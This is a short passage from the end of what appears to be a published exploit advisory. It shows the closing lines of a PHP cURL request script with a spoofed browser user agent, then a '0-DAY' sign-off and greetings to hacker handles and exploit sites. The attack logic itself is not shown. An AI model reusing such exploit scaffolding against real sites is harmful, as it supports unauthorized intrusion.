CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####